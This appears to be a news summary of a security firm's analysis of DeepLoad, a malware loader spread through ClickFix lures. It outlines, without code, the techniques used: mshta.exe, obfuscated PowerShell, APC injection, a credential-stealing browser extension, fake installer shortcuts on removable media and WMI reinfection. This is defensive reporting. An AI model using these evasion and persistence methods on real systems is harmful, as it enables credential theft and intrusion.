A new malware campaign is using the ClickFix social engineering tactic to distribute a previously undocumented loader called DeepLoad, according to a technical analysis from ReliaQuest. The activity includes credential theft, browser extension abuse and reinfection through Windows Management Instrumentation, with researchers saying the loader can re-execute on a cleaned host three days later.
KEY FACTS
- Delivery Users are tricked into pasting PowerShell commands into the Windows Run dialog through a ClickFix lure.
- Loader behavior The malware uses mshta.exe, obfuscation, PowerShell history removal and APC injection.
- Data theft DeepLoad targets browser passwords and drops a malicious extension that captures login credentials.
- Spread It can copy itself to removable media using fake installer file names and later reinfect hosts through WMI.
The report says the initial stage uses a legitimate Windows utility, mshta.exe, to download and run an obfuscated PowerShell loader. The code hides its real function among meaningless variable assignments, and the researchers said the obfuscation layer appears to have been built with help from an AI tool.
DeepLoad also places its payload in a file named LockAppHost.exe to blend in with normal Windows activity. It compiles a temporary DLL with PowerShell’s Add-Type feature, disables PowerShell command history and uses native Windows functions directly, which can make monitoring more difficult.
The disclosure says the loader uses asynchronous procedure call injection to run inside a trusted Windows process without writing a decoded payload to disk. It also installs a malicious browser extension that intercepts credentials on login pages and can persist across user sessions unless removed.
Researchers said the malware can detect removable media and copy infected files under names such as ChromeSetup.lnk, Firefox Installer.lnk and AnyDesk.lnk. A separate section of the report notes that WMI was used to reinfect a clean host days later without user action or attacker interaction.
WHY IT MATTERS
The campaign combines social engineering, credential theft and persistence in ways that can help it survive basic defenses and spread across systems. Its use of Windows tools and delayed reinfection also makes detection harder for organizations that rely on process chains and file-based alerts.